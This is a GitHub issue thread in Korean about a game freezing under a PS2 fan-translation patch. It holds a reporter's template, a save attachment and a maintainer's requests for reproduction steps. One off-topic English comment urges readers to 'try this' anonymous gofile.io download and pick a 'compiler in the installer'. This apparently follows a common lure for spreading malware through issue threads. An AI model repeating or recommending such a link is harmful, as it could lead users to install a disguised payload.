### ISSUE TITLE
라디슬로우 리트라 만나러 진입 프리징현상

### ISSUE THREAD

**Issue by asdwewe34** [ToD-DC-Kor/kor-patch#30]
[**버그에]대한 설명**
간결하고 명료하게 어떤 문제인지 설명해주세요.

**재현 방법**
재현 방법이 명확하다면, 문제를 재현할 수 있는 메모리 카드 파일과, 재현 방법을 적어주세요. ('상태 저장' 파일은 버그 재현에 사용할 수 없습니다. 메모리 카드 파일로 첨부해주세요)

세이브 파일을 로드한 시점부터 문제가 발생하는 곳까지 도달하는 재현 방법을 적어주세요. 모든 던전과 맵의 지도를 외우고 있지 못하기 때문에, 자세히 설명해 주셔야 합니다.

예시)

1. 첨부한 세이브 파일 로드
2. 오른쪽 문으로 나가서, 건물 바로 앞의 NPC 말걸기
3. 등등...

**기대 결과**
버그가 없을 경우 원래 기대되는 결과를 적어주세요.

**스크린샷**
가능하다면 도움이 되는 스크린샷을 첨부해주세요

**실행 환경:**
 - 패치 버전: 
 - PCSX2 버전:pcsx2 2.1.1

**체크 리스트**
- [x] 해당하는 항목을 'x' 체크해주세요
- [ ] 한국어 패치 되지 않은 버전에서도 똑같이 문제가 발생합니다
- [o] 한국어 패치 된 버전에서만 문제가 발생합니다
- [o] v0.2.1 버전 이후에 작성된 세이브 파일로 진행했습니다
- [ 
[Mcd001.zip](https://github.com/user-attachments/files/16870931/Mcd001.zip)
] 최신 한국어 패치 버전을 사용했습니다

**Comment by DeadBoySmile** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by kexplo** [comment]
최신 패치 버전을 사용했나요?
어떤 문제인지 자세히 설명하세요.
세이브 파일을 로드한 시점부터 문제가 발생하는 곳까지 도달하는 재현 방법을 적으세요.

**Comment by kexplo** [comment]
@dos1881 확인 고맙습니다.

문제 없는 것으로 알고 이슈 닫습니다.

**Comment by asdwewe34** [comment]
음 ㅠㅠ 패치하는 방법좀 알려주시면 안될까요...???
검색해서 동영상 설명 대로 해도 안되가지고요.,..

**Comment by asdwewe34** [comment]
도움감사드립니다 @dos1881
